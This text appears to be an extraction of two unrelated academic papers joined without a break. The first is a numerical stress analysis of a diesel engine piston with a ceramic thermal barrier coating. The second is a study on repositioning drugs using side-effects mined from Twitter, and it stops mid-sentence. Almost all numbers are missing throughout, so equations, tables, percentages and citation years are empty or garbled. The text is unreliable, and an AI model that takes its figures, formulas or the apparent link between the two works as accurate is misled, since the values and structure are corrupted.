distribution of temperature, temperature gradients, von-mises stresses, and displacement in the diesel engine piston with and without µm of thermal coating layer as (la zr o ) which have low thermal conductivity. the results show great improving in the performance of the piston with thermal coating layer. keywords: diesel engine piston, thermal analysis, thermal barrier coating, d finite volume method. . introduction in the combustion chamber engines, some of the parts like cylinder head, cylinder liner, piston and valve are most thermal loaded parts because they are in direct contact with the flame due to this they losses their strength and slightly deform from its original state. so it becomes important to calculate the piston stress distribution in order to control the deformations within acceptable levels. the stress distribution enables the designer to optimize the thermal aspects of the piston design at lower cost. the mechanical stress and international journal of advanced network monitoring and controls year , no. thermal stress level depends on the distribution of temperature in the parts, thermal expansion coefficient, young modulus of elasticity, thermal load, design of the parts and cooling conditions [ , ]. the diesel engine is undergoing continuous technological progression to become an adiabatic engine improvement in performance and durability of ic engine. a major breakthrough in diesel engine technology to make it adiabatic can be achieved by coating the various parts like the cylinder wall, combustion chamber, cylinder head, piston body, valves etc., with ceramic materials having very low thermal conductivity [ ]. the coating material of the adiabatic engine must have a high temperature resistance, low thermal expansion coefficient, low friction characteristics, good thermal shock resistance, high strain tolerance, low sintering rate of the porous microstructure, lightweight and durability [ , ]. the ceramic-coated piston has been widely used in the internal combustion engine, and the ceramic coating can be used as an insulating layer that reduces much of the heat loss of the internal combustion engine and obtains higher efficiency [ ]. the application of thermal barrier coatings on the diesel engine piston head reduces the heat loss to the engine cooling-jacket through the surfaces exposed to the heat transfer such as cylinder head, liner, piston crown and piston rings. it is important to calculate the piston temperature distribution in order to control the thermal stresses and deformations within acceptable levels [ ]. in the past two decades, much attention has been paid to the study on ‘adiabatic’ or ‘low heat rejection’ engines. these studies have been commonly performed on diesel engines [ ]. uzun et al. [ ] studied an experimental investigation into the effects of ceramic coatings on the performance of a diesel engine and exhaust emissions. ceramic coatings can eliminate visible smoke, inhibit the formation of nox reduce co and particulate emissions, and improve combustion efficiency. the performance of the diesel ceramic coating was tested on a hydraulic engine dynamometer. the coatings were being evaluated for their ability to control particulate emissions, for emissions in exhaust gases for smoke, horsepower, speed and fuel rate. co and hydrocarbon levels were lower than baseline levels. buyukkaya and cerit [ ] investigated thermal analyses on a conventional (uncoated) diesel piston, made of aluminum silicon alloy and steel, thermal analyses were performed on pistons, coated with mgo–zro material by means of using a commercial code, namely ansys. those results of four different pistons were compared with each other. the effects of coatings on the thermal behaviors of the pistons were investigated.it has been shown that the maximum surface temperature of the coated piston with material which has low thermal conductivity was improved approximately % for the alsi alloy and % for the steel. bhagat and jibhakate [ ] described the stress distribution of the seizure on piston four stroke engine by using fea. the finite element analysis was performed by using computer aided design (cad) software. the main objective was to investigate and analyze the thermal stress distribution of piston at the real engine condition during combustion process. that paper describes the mesh optimization with using finite element analysis technique to predict the higher stress and critical region on the component. the optimization is carried out to reduce the stress concentration on the upper end of the piston i.e (piston head/crown and piston skirt and sleeve). with using computer aided design (cad), pro/engineer software the structural model of a piston will be developed. furthermore, the finite element analysis performed with using software ansys. rakopoulos and mavropoulos [ ] used a piston model for the calculation of the temperature field and heat flow field under steady and transient engine operating conditions. three-dimensional finite-element analyses were implemented for the representation of the complex geometry metal components and found a satisfactory degree of agreement between theoretical predictions and experimental measurements. muhammet cerit [ ] determined the temperature and the stress distributions in a partial ceramic coated mechanical and thermal stresses anylsis in diesel engine poiston with and without different thermal coating layer on piston head international journal of advanced network monitoring and controls year , no. spark ignition (si) engine piston. effects of coating thickness and width on temperature and stress distributions were investigated including comparisons with results from an uncoated piston. it was observed that the coating surface temperature increase with increasing the thickness in a decreasing rate. surface temperature of the piston with . mm coating thickness was increased up to ° c. the normal stress on the coated surface decreases with coating thickness, up to approximately mm for which the value of stress was the minimum. however, it rises when coating thickness exceeds mm. as for bond coat surface, increasing coating thickness, the normal stress decreases steadily and the maximum shear stress rises in a decreasing rate. the optimum coating thickness was found to be near mm under the given conditions. li [ ] used a three-dimensional finite element model of an aluminum diesel engine piston to calculate operating temperatures. he showed that skirt contours played an important part in the reduction of scuffing and friction. prasad et al. [ ] used thermally insulating material, namely partially stabilized zirconia (psz), on the piston crown face and reported a % reduction in heat loss through the piston. pierz [ ] investigated the thermal barrier coating development for diesel engine aluminum piston he found that the resulting predicted temperatures and stresses on the piston, together with material strength information, the primary cause of coating failure is proposed to be low cycle fatigue resulting from localized yielding when the coating is hot and in compression. the main scope of this work is to reduce the mechanical and thermal stresses level depends on the distribution of temperature in the piston and to increase the life span of the coated pistons of the engine using a thermal barrier coating (tbc) technology. the best performance can be obtained by combining the chosen materials and its own properties combines to create better performance. . numerical model three dimensional finite volume method (fvm) model of a diesel engine piston has been presented. the model accounts for mechanical and thermal loads that arise in the engine piston due to its operating. the geometry of the piston is shown in figure . the piston sits on the connecting road with crankshaft. figure. geometry of the engine diesel piston. . computational domain a computational model of an entire diesel engine piston would require very large computing resources and excessively long simulation times. the computational domain in this study is therefore limited to a sector from the cylindrical geometry of the piston. the three dimensional computational domain of the diesel engine piston used in the model is shown in figure . figure. . three dimensional computational domain of the diesel engine piston. . modelling equations the prediction of the temperature distribution in the diesel engine piston, involves the solution of the heat transfer equation; heat conduction and heat convection with the appropriate boundary conditions. the heat transfer in the diesel engine piston is governed by [ ]; ( ) where is the density [kg/m ], cp is the heat capacity [kj/kg.k], k is the thermal conductivity [w/m.k], u is the velocity vector [m/s], and q is the heat source [w]. the diesel engine piston is subjected to the pressure force of the hot gases as shown in figures and . the heat transfer coefficient at the diesel engine piston head is calculated using the following equation [ ]; ( ) where hg is the heat transfer coefficient [w/m .k], pg is the gas pressure [pa], tg is the gas temperature [k], vp is the mean piston speed [m/s], b is the piston bore [mm], and is the crank shaft angle [degree]. because of high variation of the temperature and pressure inside the combustion chamber during the engine cycle, the resulting gas temperature (tgr) and mean heat transfer coefficient (hgm) can be mechanical and thermal stresses anylsis in diesel engine poiston with and without different thermal coating layer on piston head international journal of advanced network monitoring and controls year , no. calculated as [ ]; ( ) ( ) ( ) mechanical and thermal stresses will be analysed with the following equations [ ]; ( ) the thermal strains resulting from a change in temperature of an unconstrained isotropic volume are given by [ ]; ( ) where is the thermal expansion [ /k], and tref is the valve reference temperature. the analysis was performed under the worst thermal loading condition of rated power. the engine specification and operating condition are summarized in table . table engine specifications and operating conditions component value piston bore [mm] . connecting rod [mm] cylinder number int. valve number. exh. valve number compression ratio . valve lift [mm] . engine speed [rpm] air fuel ratio power [hp] piston stroke [mm] . mean piston speed [m/s] . figure. diagram of measured gas pressure in the cylinder. figure. diagram of measured gas temperature in the cylinder. . . computational procedure the governing equations were discretized using a finite-volume method and solved using multi-physics comsol package version . stringent numerical tests were performed to ensure that the solutions were independent of the grid size. a computational quadratic mesh consisting of a total of domain elements, boundary elements, and edge elements was found to provide sufficient spatial resolution (figure ). in addition to the heat transfer boundary conditions, the mechanical boundary conditions were applied as shown in table . the coupled set of equations was solved iteratively, and the solution was considered to be convergent when the relative error was less than . × - in each field between two consecutive iterations. mechanical and thermal stresses anylsis in diesel engine poiston with and without different thermal coating layer on piston head international journal of advanced network monitoring and controls year , no. figure. computational mesh of the computational domain. table boundary conditions mechanical and thermal stresses anylsis in diesel engine poiston with and without different thermal coating layer on piston head international journal of advanced network monitoring and controls year , no. . . comparing with real damage cases the results of the numerical model are showing the temperature gradients in the diesel engine piston. the maximum values of the temperature gradients appear around the piston head and also occur in the rings grooves. this leads to develop and increase of the maximum thermal stress, and as a result, it contributes to the formation of microcracks. at the worst conditions for the cooling of the piston such as distortion of the piston head, this stress causes radial cracks at the edge of the piston. in addition, microcracks lead to loss in material of the piston and consequently to its defects. examples of damage of the diesel engine piston shows in figure with good similarity to the numerical model. . effect of the coated layer on the piston performance in addition to revealing the detail of mechanical and thermal phenomena inside the engine piston, the comprehensive three-dimensional model can also be used to investigate the sensitivity of certain parameters on piston performance. the validated model is now ready for studying the effects of the coating of the top surface of the piston with different types of thermal barrier coatings material on the piston performance. the performance characteristics of the engine piston based on a certain parameter can be obtained by varying that parameter (material properties of the coated layer) while keeping all other parameters constant at base case conditions. results obtained from these parametric studies will allow the identification of the critical parameters for piston performance as well as the sensitivity of the model to these parameters. the top surface of the piston head is coated with µm thickness of various thermal barrier materials (figure ). material properties of each coated layer are shown in table . table material properties of the coated layer on the top surface of the piston figure. visual comparison between the result of the numerical model and examples of the real damage pistons. mechanical and thermal stresses anylsis in diesel engine poiston with and without different thermal coating layer on piston head international journal of advanced network monitoring and controls year , no. figure. thermal barrier material coated layer on the top surface of the piston head. . results results obtained from the mechanical and thermal phenomena inside the engine piston analyses by the finite volume technique, the temperature and stress variations for the uncoated top surface of the piston and coated top surface of the piston by the ceramic material are discussed systematically. for thermal barrier coatings in an engine, heat conduction is generally more dominant than radiation; hence, the thermal conductivity of material is very important for estimating temperature distributions and heat flows. the temperature distribution of the piston without and with coating layer is shown in figure . as expected, the high temperatures are observed at the crown center and bowl lip areas, since it is subjected to the heat flux circumferentially. the maximum temperature is at the center and the minimum is at the bottom of the crown bowl on the piston top surface. in the radial direction, the temperature decreases from the crown center to the bottom of the bowl, then it increases towards the bowl lips and finally decreases again at the edge of the crown surface. von-mises stress distributions versus distance for uncoated and coated top piston surfaces are shown in figure . in the coating case, the von-mises stress distributions decreases due to decreasing in the thermal conductivity of the ceramic material. temperature gradients distribution for uncoated and coated pistons on the top piston surfaces are shown in figure . the maximum values of the temperature gradients appear around the piston head and also occur in the rings grooves. this leads to develop and increase of the maximum thermal stress, and as a result, this stress causes radial cracks at the edge of the piston. by using coating layer on the top piston surfaces, the temperature gradients distribution has been decreased due to the low thermal conductivity of the ceramic material and this leads to reduce failure in the piston. figure shows displacement distribution of the standard piston and coated pistons. ceramic coating material has a low heat transfer coefficient and this reduce the displacement in the piston. figure. temperature distribution of the engine piston [oc] without (upper) and with (lower) coating layer on the top surface of the piston head. mechanical and thermal stresses anylsis in diesel engine poiston with and without different thermal coating layer on piston head international journal of advanced network monitoring and controls year , no. figure. von-mises stress distribution of the engine piston [mpa] without (upper) and with (lower) coating layer on the top surface of the piston head. figure. temperature gradients distribution of the engine piston [k/mm] without (upper) and with (lower) coating layer on the top surface of the piston head. mechanical and thermal stresses anylsis in diesel engine poiston with and without different thermal coating layer on piston head international journal of advanced network monitoring and controls year , no. figure. displacement distribution of the engine piston [mm] without (upper) and with (lower) coating layer on the top surface of the piston head. . conclusion the purpose of this work was to compare the behaviour of the piston without and with coating layer on the top of piston under thermal and mechanical loads. the obtained results shows that the thermal and mechanical stresses induced in piston with coating layer are less as compare to the piston without coating layer. the coating material has been applied successfully to the engine piston as the thermal barrier coating of a diesel engine prevents excessive heat loss during combustion. through the analysis, it is concluded that the main factor influencing the piston intensity is the temperature, thus providing basis for the optimization design of the piston. the stress and the deformation of the piston are mainly determined by the temperature, so it is necessary to decrease the piston temperature through structure improvement. the results of the numerical model are showing the temperature gradients in the diesel engine piston. the maximum values of the temperature gradients appear around the piston head and also occur in the rings grooves. this leads to develop and increase of the maximum thermal stress, and as a result, it contributes to the formation of micro cracks. it is important to calculate the piston temperature distribution in order to control the thermal stresses and deformations within acceptable levels. references [ ] subodh kumar sharma , p. k. saini and n. k. samria. thermo–mechanical analysis of av diesel engine piston using fem . journal of advanced engineering research issn: - volume , issue , , pp. - . [ ] rr.sekar and r. kamo. advanced adiabatic diesel engine for passenger cars. sae paper . [ ] pawar, a., jajoo, b., and nandagoankar, m. combustion analysis and performance of low heat rejection diesel engine with different thermal insulation coating, sae technical paper: , . [ ] hui dai, xinghuazhong, jiayan li and et al. surface & coatings technology, , – . [ ] bin zhao. thermal stress analysis of ceramic-coated diesel engine pistons based on the wavelet finite-element method. american society of civil engineers, . [ ] k. sridhar, r. reji kumar and m. narasimha. thermal barrier analysis in diesel. international journal of modern engineering research (ijmer), vol. , issue. , may-june. pp- - . [ ] v. gnanamoorthi and g. devaradjane. the effect of thermal barrier coating material in ci engine using higher fraction ethanol diesel blend. journal of chemical and pharmaceutical research, , ( ): - . [ ] abdullah uzun , i˙smet c evik and mustafa akc,il. effects of thermal barrier coating on a turbocharged diesel engine performance. surface and coatings technology – ( ) – . [ ] ekrem buyukkaya and muhammet cerit. thermal analysis of a ceramic coating diesel engine piston using -d finite element method. surface & coatings technology ( ) – . [ ] a. r. bhagat and y. m. jibhakate . thermal analysis and optimization of i.c. engine piston using finite element method. international journal of modern engineering research (ijmer), vol. , issue. , july-aug pp- - . [ ] c.d. rakopoulos and g.c. mavropoulos, study of the steady and transient temperature field and heat flow in the combustion chamber components of a medium speed diesel engine using finite element analyses, international journal of energy research, ( ), , - . [ ] muhammet cerit. thermo mechanical analysis of a partially ceramic coated piston used in an si engine. surface & coatings technology ( ) – . [ ] c.h. li, thermoelastic behavior of an aluminium diesel engine piston, general motors research labs, warren, sae paper , . [ ] r. prasad, n.k. samria, comput. struct. ( ) ( ) . [ ]. p.m. pierz, ( ) thermal barrier coating development for diesel engine aluminium pistons. [ ] maher a.r. sadiq al-baghdadi. applications of computational fluid dynamics and finite element methods in engineering education. international energy and environment foundation , isbn: . [ ] muhammet cerit, mehmet coban. temperature and thermal stress analyses of a ceramic-coated aluminum alloy piston used in a diesel engine. international journal of thermal sciences , , pp. - . mechanical and thermal stresses anylsis in diesel engine poiston with and without different thermal coating layer on piston head computational drug repositioning based on side-effects mined from social media submitted september accepted january published february corresponding author timothy nugent, timnugent@gmail.com, tim.nugent@thomsonreuters.com academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright nugent et al. distributed under creative commons cc-by . open access computational drug repositioning based on side-effects mined from social media timothy nugent, vassilis plachouras and jochen l. leidner thomson reuters, corporate research and development, london, united kingdom abstract drug repositioning methods attempt to identify novel therapeutic indications for marketed drugs. strategies include the use of side-effects to assign new disease indications, based on the premise that both therapeutic effects and side-effects are measurable physiological changes resulting from drug intervention. drugs with similar side-effects might share a common mechanism of action linking side-effects with disease treatment, or may serve as a treatment by “rescuing” a disease phenotype on the basis of their side-effects; therefore it may be possible to infer new indications based on the similarity of side-effect profiles. while existing methods leverage side-effect data from clinical studies and drug labels, evidence suggests this information is often incomplete due to under-reporting. here, we describe a novel computational method that uses side-effect data mined from social media to generate a sparse undirected graphical model using inverse covariance estimation with ℓ -norm regularization. results show that known indications are well recovered while current trial indications can also be identified, suggesting that sparse graphical models generated using side-effect data mined from social media may be useful for computational drug repositioning. subjects bioinformatics, data mining and machine learning, computational biology, social computing keywords drug repositioning, drug repurposing, side-effect, adverse drug reaction, social media, graphical model, graphical lasso, inverse covariance estimation introduction drug repositioning is the process of identifying novel therapeutic indications for marketed drugs. compared to traditional drug development, repositioned drugs have the advantage of decreased development time and costs given that significant pharmacokinetic, toxicology and safety data will have already been accumulated, drastically reducing the risk of attrition during clinical trials. in addition to marketed drugs, it is estimated that drug libraries may contain upwards of , failed drugs that have the potential to be repositioned, with this number increasing at a rate of – compounds per year (jarvis, ). repositioning of marketed or failed drugs has opened up new sources of revenue for pharmaceutical companies with estimates suggesting the market could generate multi-billion dollar annual sales in coming years (thomson reuters, ; tobinick, ). while many of the current successes of drug repositioning have come about through serendipitous clinical observations, systematic data-driven approaches are now showing increasing promise given their ability to generate repositioning hypotheses how to cite this article nugent et al. ( ), computational drug repositioning based on side-effects mined from social media. peerj comput. sci. :e ; doi . /peerj-cs. mailto:timnugent@gmail.com mailto:tim.nugent@thomsonreuters.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. for multiple drugs and diseases simultaneously using a wide range of data sources, while also incorporating prioritisation information to further accelerate development time (hurle et al., ). existing computational repositioning strategies generally use similar approaches but attempt to link different concepts. they include the use of transcriptomics methods which compare drug response gene-expression with disease gene-expression signatures (lamb et al., ; hu & agarwal, ; iorio et al., ; sirota et al., ; dudley et al., ), genetics-based methods which connect a known drug target with a genetically associated phenotype (franke et al., ; zhang et al., ; wang & zhang, ; sanseau et al., ; wang et al., ), network-based methods which link drugs or diseases in a network based on shared features (krauthammer et al., ; barabasi, gulbahce & loscalzo, ; kohler et al., ; vanunu et al., ; emig et al., ), and methods that use side-effect similarity to infer novel indications (campillos et al., ; yang & agarwal, ; zhang et al., ; cheng et al., ; bisgin et al., ; duran-frigola & aloy, ; wang et al., ; ye, liu & wei, ). drug side-effects can be attributed to a number of molecular interactions including on or off-target binding, drug–drug interactions (vilar et al., ; tatonetti et al., ), dose-dependent pharmacokinetics, metabolic activities, downstream pathway perturbations, aggregation effects, and irreversible target binding (xie et al., ; campillos et al., ). while side-effects are considered the unintended consequence of drug intervention, they can provide valuable insight into the physiological changes caused by the drug that are difficult to predict using pre-clinical or animal models. this relationship between drugs and side-effects has been exploited and used to identify shared target proteins between chemically dissimilar drugs, allowing new indications to be inferred based on the similarity of side-effect profiles (campillos et al., ). one rationale behind this and related approaches is that drugs sharing a significant number of side-effects might share a common mechanism of action linking side-effects with disease treatment—side-effects essentially become a phenotypic biomarker for a particular disease (yang & agarwal, ; duran-frigola & aloy, ). repositioned drugs can also be said to “rescue” a disease phenotype, on the basis of their side-effects; for example, drugs which cause hair growth as a side-effect can potentially be repositioned for the treatment of hair loss, while drugs which cause hypotension as a side-effect can be used to treat hypertension (yang & agarwal, ). examples of drugs successfully repositioned based on phenotypic rescue that have made it to market include exenatide, which was shown to cause significant weight loss as a side-effect of type diabetes treatment, leading to a trial of its therapeutic effect in non-diabetic obese subjects (buse et al., ; ladenheim, ), minoxidil which was originally developed for hypertension but found to cause hair growth as a side-effect, leading to its repositioning for the treatment of hair loss and androgenetic alopecia (shorter et al., ; li et al., ), and, perhaps most famously, sildenafil citrate which was repositioned while being studied for the primary indication of angina to the treatment of erectile dysfunction (ghofrani, osterloh & grimminger, ). existing repositioning methods based on side-effects, such as the work of campillos et al. ( ) and yang & agarwal ( ), have used data from the sider database (kuhn nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. et al., ), which contains side-effect data extracted from drug labels, largely collected from clinical trials during the pre-marketing phase of drug development. other resources include meyler’s side effects of drugs (aronson, ), which is updated annually in the side effects of drugs annual (ray, ), and the drugs@fda database (us food and drug administraction, ), while pharmacovigilance authorities attempt to detect, assess and monitor reported drug side-effects post-market. despite regular updates to these resources and voluntary reporting systems, there is evidence to suggest that side-effects are substantially under-reported, with some estimates indicating that up to % of adverse drug reactions go unreported for reasons that include lack of incentives, indifference, complacency, workload and lack of training among healthcare professionals (backstrom, mjorndal & dahlqvist, ; lopez-gonzalez, herdeiro & figueiras, ; hazell & shakir, ; tandon et al., ). side-effects reported from clinical trials also have limitations due to constraints on scale and time, as well as pharmacogenomic effects (evans & mcleod, ). a number of cancer drug studies have also observed that women are often significantly under-represented in clinical trials, making it difficult to study the efficacy, dosing and side-effects of treatments which can work differently in women and men; similar problems of under-representation also affect paediatrics, as many drugs are only ever tested on adults (jones, ). recently, efforts to mine user-generated content and social media for public-health issues and side-effects have shown promising performance, demonstrating correlations between the frequency of side-effects extracted from unlabelled data and the frequency of documented adverse drug reactions (leaman et al., ). despite this success, a number of significant natural language processing challenges remain. these include dealing with idiomatic expressions, linguistic variability of expression and creativity, ambiguous terminology, spelling errors, word shortenings, and distinguishing between the symptoms that a drug is treating and the side-effects it causes. some of the solutions proposed to deal with these issues include the use of specialist lexicons, appropriate use of semantic analysis, and improvements to approximate string matching, modeling of spelling errors, and contextual analysis surrounding the mentions of side-effects (leaman et al., ; segura- bedmar et al., ), while maintaining a list of symptoms for which a drug is prescribed can help to eliminate them from the list of side-effects identified (sampathkumar, chen & luo, ). although much of the focus has explored the use of online forums where users discuss their experience with pharmaceutical drugs and report side-effects (chee, berlin & schatz, ), the growing popularity of twitter ( ), which at the time of writing has over million active monthly users, provides a novel resource upon which to perform large-scale mining of reported drug side-effects in near real-time from the millions tweets posted daily (internet live stats, ). while only a small fraction of these daily tweets are related to health issues, the sheer volume of data available presents an opportunity to bridge the gap left by conventional side-effects reporting strategies. over time, the accumulation of side-effect data from social media may become comparable or even exceed the volume of traditional resources, and at the very least should be sufficient to nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. augment existing databases. additionally, the cost of running such a system continuously is relatively cheap compared to existing pharmacovigilance monitoring, presenting a compelling economic argument supporting the use of social media for such purposes. furthermore, the issues related to under-representation described above may be addressed. freifeld et al. ( ) presented a comparison study between drug side-effects found on twitter and adverse events reported in the fda adverse event reporting system (faers). starting with . million tweets, they used a set of drug names and a list of symptoms to reduce that data to a subset of , tweets. after manual examination, there were , tweets identified as mentioning a side-effect, with a spearman rank correlation found to be . . nikfarjam et al. ( ) introduce a method based on conditional random fields (crf) to tag mentions of drug side-effects in social media posts from twitter or the online health community dailystrength. they use features based on the context of tokens, a lexicon of adverse drug reactions, part-of-speech (pos) tags and a feature indicating whether a token is negated or not. they also used embedding clusters learned with word vec (mikolov et al., ). they reported an f score of . % for data from dailystrength and . % for twitter data. sarker & gonzalez ( ) developed classifiers to detect side-effects using training data from multiple sources, including tweets (ginn et al., ), dailystrength, and a corpus of adverse drug events obtained from medical case reports. they reported an f score of . % when training a support vector machine (svm) with radial basis function (rbf) kernel on all three datasets. recently, karimi et al. ( ) presented a survey of the field of surveillance for adverse drug events with automatic text and data mining techniques. in this study, we describe a drug repositioning methodology that uses side-effect data mined from social media to infer novel indications for marketed drugs. we use data from a pharmacovigilance system for mining twitter for drug side-effects (plachouras, leidner & garrow, under review). the system uses a set of cascading filters to eliminate large quantities of irrelevant messages and identify the most relevant data for further processing, before applying a svm classifier to identify tweets that mention suspected adverse drug reactions. using this data we apply sparse inverse covariance estimation to construct an undirected graphical model, which offers a way to describe the relationship between all drug pairs (meinshausen & bühlmann, ; friedman, hastie & tibshirani, ; banerjee, elghaoui & d’aspremont, ). this is achieved by solving a maximum likelihood problem using ℓ -norm regularization to make the resulting graph as sparse as possible, in order to generate the simplest graphical model which fully explains the data. results from testing the method on known and proposed trial indication recovery suggest that side-effect data mined from social media in combination with a regularized sparse graphical model can be used for systematic drug repositioning. methods mining twitter for drug side-effects we used the somedoses pharmacovigilance system (plachouras, leidner & garrow, under review) to extract reports of drug side-effects from twitter over a month period between nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. january and june . somedoses works by first applying topic filters to identify tweets that contain keywords related to drugs, before applying volume filters which remove tweets that are not written in english, are re-tweets or contain a hyperlink to a web page, since these posts are typically commercial offerings. side-effects were then mapped to an entry in the fda adverse event reporting system. tweets that pass these filters are then classified by a linear svm to distinguish those that mention a drug side-effect from those that do not. the svm classifier uses a number of natural language features including unigrams and bigrams, part-of-speech tags, sentiment scores, text surface features, and matches to gazetteers related to human body parts, side-effect synonyms, side-effect symptoms, causality indicators, clinical trials, medical professional roles, side effect-triggers and drugs. for each gazetteer, three features were created: a binary feature, which is set to if a tweet contains at least one sequence of tokens matching an entry from the gazetteer, the number of tokens matching entries from the gazetteer, and the fraction of characters in tokens matching entries from the gazetteer. for side-effect synonyms we used the consumer health vocabulary (chv) (zeng et al., ), which maps phrases to unified medical language system concept universal identifiers (cui) and partially addresses the issue of misspellings and informal language used to discuss medical issues in tweets. the matched cuis were also used as additional features. to develop the system, , tweets which passed the topic and volume filters were manually annotated as mentioning a side-effect or not, resulting in a cohen’s kappa for inter-annotator agreement on a sample of tweets annotated by two non-healthcare professional of . . using a time-based split of , tweets for training, , for development, and , for testing, the svm classifier that used all the features achieved a precision of . %, recall of . %, and f score of . % when evaluated using the , test tweets. this is statistically significantly higher than the results achieved by a linear svm classifier using only unigrams and bigrams as features (precision of . %, recall of . % and f score of . %). one of the sources of false negatives was the use of colloquial and indirect expressions by twitter users to express that they have experienced a side-effect. we also observed that a number of false positives discuss the efficacy of drugs rather than side-effects. twitter data over the month period, somedoses typically identified ∼ tweets per day that mentioned a drug side-effect, resulting in a data set of unique drugs and , unique side-effects from , tweets, once drugs with only a single side-effect were excluded and drug synonyms had been resolved to a common name using exact string matches to entries in world drug index (thomson reuters, b), which worked for approximately half of the data set with the remainder matched manually. we were also careful to remove indications that were falsely identified as side-effects using drug indications from cortellis clinical trials intelligence (thomson reuters, a). we used this data to construct a , row by column matrix of binary variables x, where x∈{ , }, indicating whether each drug was reported to cause each side-effect in the twitter data set. nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. calculating the sample covariance matrix using this data, we are able to form the sample covariance matrix s for binary variables as follows (allen, ), such that element si,j gives the covariance of drug i with drug j: si,j = n− n k= (xki − x̄i)(xkj − x̄j) = n− n k= xkixkj − x̄ix̄j ( ) where x̄i = n n k= xki and xki is the k-th observation (side-effect) of variable (drug) xi. it can be shown than the average product of two binary variables is equal to their observed joint probabilities such that: n− n k= xkixkj = p(xj = |xi = ) ( ) where p(xj = |xi = ) refers to the conditional probability that variable xj equals one given that variable xi equals one. similarly, the product of the means of two binary variables is equal to the expected probability that both variables are equal to one, under the assumption of statistical independence: x̄ix̄j = p(xi = )p(xj = ). ( ) consequently, the covariance of two binary variables is equal to the difference between the observed joint probability and the expected joint probability: si,j = p(xj = |xi = )−p(xi = )p(xj = ). ( ) our objective is to find the precision or concentration matrix θ by inverting the sample covariance matrix s. using θ , we can obtain the matrix of partial correlation coefficients ρ for all pairs of variables as follows: ρi,j =− θi,j θi,iθj,j . ( ) the partial correlation between two variables x and y given a third, z, can be defined as the correlation between the residuals rx and ry after performing least-squares regression of x with z and y with z, respectively. this value, denotated ρx,y|z , provides a measure of the correlation between two variables when conditioned on the third, with a value of zero implying conditional independence if the input data distribution is multivariate gaussian. the partial correlation matrix ρ, however, gives the correlations between all pairs of variables conditioning on all other variables. off-diagonal elements in ρ that are significantly different from zero will therefore be indicative of pairs of drugs that show unique covariance between their side-effect profiles when taking into account (i.e., removing) the variance of side-effects profiles amongst all the other drugs. nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. shrinkage estimation for the sample covariance matrix to be easily invertible, two desirable characteristics are that it should be positive definite, i.e., all eigenvalues should be distinct from zero, and well-conditioned, i.e., the ratio of its maximum and minimum singular value should not be too large. this can be particularly problematic when the sample size is small and the number of variables is large (n < p) and estimates of the covariance matrix become singular. to ensure these characteristics, and speed up convergence of the inversion, we condition the sample covariance matrix by shrinking towards an improved covariance estimator t, a process which tends to pull the most extreme coefficients towards more central values thereby systematically reducing estimation error (ledoit & wolf, ), using a linear shrinkage approach to combine the estimator and sample matrix in a weighted average: s′= αt +( −α)s ( ) where α ∈ { , } denotes the analytically determined shrinkage intensity. we apply the approach of schäfer and strimmer, which uses a distribution-free, diagonal, unequal variance model which shrinks off-diagonal elements to zero but leaves diagonal entries intact, i.e., it does not shrink the variances (schäfer & strimmer, ). shrinkage is actually applied to the correlations rather than the covariances, which has two distinct advantages: the off-diagonal elements determining the shrinkage intensity are all on the same scale, while the partial correlations derived from the resulting covariance estimator are independent of scale. graphical lasso for sparse inverse covariance estimation a useful output from the covariance matrix inversion is a sparse ρ matrix containing many zero elements, since, intuitively, we know that relatively few drug pairs will share a common mechanism of action, so removing any spurious correlations is desirable and results in a more parsimonious relationship model, while the non-zero elements will typically reflect the correct positive correlations in the true inverse covariance matrix more accurately (jones et al., ). however, elements of ρ are unlikely to be zero unless many elements of the sample covariance matrix are zero. the graphical lasso (friedman, hastie & tibshirani, ; banerjee, elghaoui & d’aspremont, ; hastie, tibshirani & wainwright, ) provides a way to induce zero partial correlations in ρ by penalizing the maximum likelihood estimate of the inverse covariance matrix using an ℓ -norm penalty function. the estimate can be found by maximizing the following log-likelihood using the block coordinate descent approach described by friedman, hastie & tibshirani ( ): logdetθ − tr(s′θ )−λ∥θ∥ . ( ) here, the first term is the gaussian log-likelihood of the data, tr denotes the trace operator and ∥θ∥ is the ℓ -norm—the sum of the absolute values of the elements of θ , weighted by the non-negative tuning paramater λ. the specific use of the ℓ -norm penalty has the nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. desirable effect of setting elements in θ to zero, resulting in a sparse matrix, while the parameter λ effectively controls the sparsity of the solution. this contrasts with the use of an ℓ -norm penalty which will shrink elements but will never reduce them to zero. while this graphical lasso formulation is based on the assumption that the input data distribution is multivariate gaussian, banerjee, elghaoui & d’aspremont ( ) showed that the dual optimization solution also applies to binary data, as is the case in our application. it has been noted that the graphical lasso produces an approximation of θ that is not symmetric, so we update it as follows (sustik & calderhead, ): θ ← (θ +θ t ) . ( ) the matrix ρ is then calculated according to eq. ( ), before repositioning predictions for drug i are determined by ranking all other drugs according to their absolute values in ρi and assigning their indications to drug i. results and discussion recovering known indications to evaluate our method we have attempted to predict repositioning targets for indications that are already known. if, by exploiting hindsight, we can recover these, then our method should provide a viable strategy with which to augment existing approaches that adopt an integrated approach to drug repositioning (emig et al., ). figure a shows the performance of the method at identifying co-indicated drugs at a range of λ values, resulting in different sparsity levels in the resulting ρ matrix. we measured the percentage at which a co-indicated drug was ranked amongst the top , , , and predictions for the target drug, respectively. of the drugs in our data set, had a primary indication listed in cortellis clinical trials intelligence, with the majority of the remainder being made up of dietary supplements (e.g., methylsulfonylmethane) or plant extracts (e.g., agaricus brasiliensis extract) which have no approved therapeutic effect. rather than removing these from the data set, they were left in as they may contribute to the partial correlation between pairs of drugs that do have approved indications. results indiciate that the method achieves its best performance with a λ value of − where . % ( / ) of targets have a co-indicated drug returned amongst the top ranked predictions (fig. a). this value compares favourably with both a strategy in 